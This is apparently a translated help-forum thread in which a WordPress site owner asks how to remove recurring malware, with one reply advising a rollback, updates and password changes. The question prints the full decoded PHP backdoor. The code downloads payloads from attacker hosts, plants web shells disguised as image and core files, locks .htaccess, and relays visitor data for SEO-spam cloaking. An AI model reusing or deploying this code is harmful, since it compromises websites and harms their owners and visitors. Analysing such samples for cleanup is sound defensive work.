Answer the question
In order to leave comments, you need to log in
I don’t know the name, but it places .htacces everywhere, how to remove the virus?
This is the second time I've had this infection. As far as I understand, the ultimate goal of the virus is to place .htacces everywhere so that there would be a 403 error everywhere, and then either get in touch or simply offer to unlock for money.
I scan with an antivirus, I deleted all the malicious files, but one file stubbornly does not want to be deleted, in the index.php root folder. The malicious code itself is obfuscated, the decode shows this:
<?php error_reporting(0);
$go_domain = "om814-2.thecutecar.online";
$language = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 4);
$userrefer = $_SERVER['HTTP_REFERER'] ? $_SERVER['HTTP_REFERER'] : "";
$useragent = $_SERVER['HTTP_USER_AGENT'] ? $_SERVER['HTTP_USER_AGENT'] : "";
$userip = '';
@$timezone_out = date_default_timezone_get();
if (getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$userip = getenv('REMOTE_ADDR');
} elseif (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$userip = $_SERVER['REMOTE_ADDR'];
}
$ips = explode(",", $userip);
$userip = trim(current($ips));
$http = 'http';
if (is_https()) {
$http = 'https';
} else {
$http = 'http';
}
$index_url = "http://$go_domain/index.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s&ip=%s";
$sitemap_url = "http://$go_domain/sitemap.php?dom=%s&uri=%s&http=%s&refer=%s&agent=%s&lang=%s";
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
$uri_script = "";
if (strstr($uri, ".php")) {
$uri_arr = explode(".php", $uri);
$uri_script = $uri_arr[0] . ".php?";
$uri = $uri_arr[1];
$uri = str_replace("?", "/", $uri);
}
@$action = $_GET['ac'] ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
$index_name = basename($_SERVER['SCRIPT_NAME']);;
write($index_name);
echo "write done!";
exit();
} elseif ($action != "" && $action == "check") {
check();
exit();
} elseif ($action != "" && $action == "sitemap") {
$sitemap = "https://www.google.com/webmasters/sitemaps/ping?sitemap=$http://$host/sitemap.xml";
$contents = file_get_contents($sitemap);
echo $contents;
exit();
} elseif ($action != "" && $action == "robots") {
$data = 'User-agent: *
Allow: /';
$uri_script = trim($uri_script);
if ($uri_script != "" && $uri_script != "/index.php?") {
$data = trim($data) . "
" . "Sitemap: $http://" . $host . $uri_script . "sitemap.xml";
} else {
$data = trim($data) . "
" . "Sitemap: $http://" . $host . "/sitemap.xml";
}
$num = mt_rand(80, 99);
for ($i = 0;$i < $num;$i++) {
if (trim($uri_script) != "" && $uri_script != "/index.php?") {
$data = trim($data) . "
" . "Sitemap: $http://" . $host . $uri_script . "sitemap$i.xml";
} else {
$data = trim($data) . "
" . "Sitemap: $http://" . $host . "/sitemap$i.xml";
}
}
@chmod("robots.txt", 0755);
file_put_contents("robots.txt", $data);
echo "robots write done!!";
exit();
}
if (preg_match('@^/sitemap(\d+)[email protected]', $uri)) {
$request = sprintf($sitemap_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language));
$content = get($request);
@header("Content-type: text/xml");
if (trim($uri_script) != "") {
$content = str_ireplace($http . "://" . $host . "/", $http . "://" . $host . $uri_script, $content);
}
$date_str = date("Y-m-d\TH:i:sP", time());
$content = str_replace("{###data_str###}", $date_str, $content);
echo trim($content);
exit();
} elseif (substr($uri, -4) == ".css") {
$request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip);
$content = get($request);
if (strstr($content, 'okhtmlgetcontent')) {
@header("Content-type: text/css; charset=utf-8");
$content = str_replace("okhtmlgetcontent", '', $content);
echo trim($content);
exit();
}
} else {
$request = sprintf($index_url, $host, urlencode($uri), $http, urlencode($userrefer), urlencode($useragent), urlencode($language), $userip);
$content = get($request);
if (trim($uri_script) != "") {
$content = str_ireplace($http . "://" . $host . "/", $http . "://" . $host . $uri_script, $content);
}
$date_str = date("Y-m-d\TH:i:sP", time());
$content = str_replace("{#date_str}", $date_str, $content);
if (strstr($content, 'okhtmlgetcontent')) {
@header("Content-type: text/html; charset=utf-8");
$content = str_replace("okhtmlgetcontent", '', $content);
echo trim($content);
exit();
} else if (strstr($content, 'getcontent404page')) {
@header('HTTP/1.1 404 Not Found');
echo "404 Not Found";
exit();
} else if (strstr($content, 'getcontent301page')) {
@header('HTTP/1.1 301 Moved Permanently');
$content = str_replace("getcontent301page", '', $content);
header('Location: ' . trim($content));
exit();
} else if (strstr($content, 'getcontent500page')) {
@header('HTTP/1.1 500 Internal Server Error');
$content = str_replace("getcontent500page", '', $content);
echo "500 Internal Server Error";
exit();
}
}
function write($index_name) {
$write1 = get("http://hello.firstguide.xyz/write1.txt");
$write2 = get("http://hello.firstguide.xyz/write2.txt");
$shell_postfs = get("http://hello.firstguide.xyz/mm1.txt");
$shell_load = get("http://hello.firstguide.xyz/mm2.txt");
$ht_content = file_get_contents(".htaccess");
$index_content = file_get_contents($index_name);
$loader_php = "wp-includes/template-loader.php";
$load_php = "wp-includes/load.php";
$font_editor_php = "wp-includes/SimplePie/index.php";
if (!is_dir("css")) {
mkdir("css", 0755, true);
}
if ($index_name != "index.php") {
$write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1);
$write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2);
}
file_put_contents("css/load.php", $shell_load);
if (is_dir("wp-includes/SimplePie")) {
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
$loader_content = file_get_contents($loader_php);
$load_content = file_get_contents($load_php);
@chmod($loader_php, 0755);
@chmod($load_php, 0755);
file_put_contents($loader_php, $write1 . $loader_content);
file_put_contents($load_php, $load_content . $write2);
@chmod($loader_php, 0644);
@chmod($load_php, 0644);
file_put_contents($font_editor_php, $shell_postfs);
}
}
function check() {
$new_ht_content = get("http://hello.firstguide.xyz/shl/htaccess.txt");
@chmod(".htaccess", 0755);
$ht_content = file_get_contents(".htaccess");
file_put_contents(".htaccess", $new_ht_content);
@chmod(".htaccess", 0444);
}
function get($url) {
$contents = @file_get_contents($url);
if (!$contents) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$contents = curl_exec($ch);
curl_close($ch);
}
return $contents;
}
function is_https() {
if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') {
return true;
} elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') {
return true;
} elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') {
return true;
}
return false;
}
Answer the question
In order to leave comments, you need to log in
Insertion into the index through some kind of shell. Automatic antivirus and any plugins are not able to detect all of them. Only on the tops are enough.
Tips like adding a plugin to protect against Wordfence or Succuri don't work here either. They are more or less effective before penetration rather than after.
In general, there are only two options. And the first one can't always help.
1. deep rollback, before the date of the appearance of viruses, preferably long. For two months.
Then, after the rollback, update the VP, update the plugins and change the passwords of the admins and in the database.
2. turn to a specialist like me (I specialize in removal and protection. 9 months warranty on VP), who will search manually.
As far as I understand, the ultimate goal of the virus is to place .htacces everywhere so that there would be a 403 error everywhere, and then either get in touch or simply offer to unlock for money.
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question